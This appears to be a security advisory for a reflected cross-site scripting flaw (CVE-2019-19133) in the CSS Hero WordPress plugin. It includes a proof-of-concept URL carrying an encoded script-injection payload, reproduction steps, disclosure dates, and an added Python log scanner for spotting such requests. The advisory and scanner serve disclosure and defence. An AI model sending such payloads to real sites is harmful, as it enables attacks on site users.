WordPress CSS Hero 4.0.3 Cross Site Scripting ≈ Packet Storm

Team,

Document Title

===============

CVE-2019-19133

Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin.

Product Description

===============

CSS Hero WordPress Plugin

A live WordPress Theme editor that works without modifying any of your
theme files. Very low performance footprint: only generates and adds a
single static CSS file to your site.

Homepage: https://www.csshero.org/

CSS Hero is vulnerable to a reflected XSS attack (authenticated).

PoC

===============

Steps:

1) Authenticate to the WordPress application with the CSS Hero plugin installed.

2) Navigate to the following vulnerable link:

hxxp://vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar

3) JavaScript executes within the context of the browser. The
arbitrary parameter and value are reflected into the returned HTML.
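
For reviewing web server logs on sites that ran an affected version, the following added example (not part of the original advisory or the plugin's code) flags requests that invoke csshero_action and carry HTML metacharacters in any query parameter name or value. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Characters that let reflected input break out of an HTML attribute or tag.
HTML_META = re.compile(r"[<>\"']")
# Assumed combined/common log format: client IP first, request line in quotes.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_csshero_params(request_target):
    """Return decoded (name, value) pairs containing HTML metacharacters
    when the request invokes csshero_action; otherwise an empty list."""
    query = urlsplit(request_target).query
    # keep_blank_values=True matters: the advisory's markup sits in a
    # parameter *name* with no '=value', which parse_qsl drops by default.
    pairs = parse_qsl(query, keep_blank_values=True)
    if not any(name == "csshero_action" for name, _ in pairs):
        return []
    return [(n, v) for n, v in pairs
            if HTML_META.search(n) or HTML_META.search(v)]

def scan_access_log(lines):
    """Return [(client_ip, hits)] for log lines that match the pattern."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = suspicious_csshero_params(m.group(2))
        if hits:
            findings.append((m.group(1), hits))
    return findings

# Constructed sample log lines (documentation IP ranges, harmless marker tag).
SAMPLE_LOG = [
    '198.51.100.4 - - [02/Dec/2019:10:00:01 +0000] "GET /?csshero_action=edit_page&rand=1015 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [02/Dec/2019:10:00:09 +0000] "GET /?csshero_action=edit_page&rand=1015&foo%22%3E%3Cb%3Ebar HTTP/1.1" 200 5188',
    '198.51.100.9 - - [02/Dec/2019:10:00:15 +0000] "GET /?s=%3Cb%3E HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for ip, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits)
```

A match only shows that such a request was received; whether it was reflected unescaped depends on the installed plugin version.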

Responsible Disclosure Information

===============

Vendor Contacted: 11/17

Date Patched: 11/20

Patched Version: v.4.0.7

Public Disclosure: 12/2

Cary Hooper

@nopantrootdance
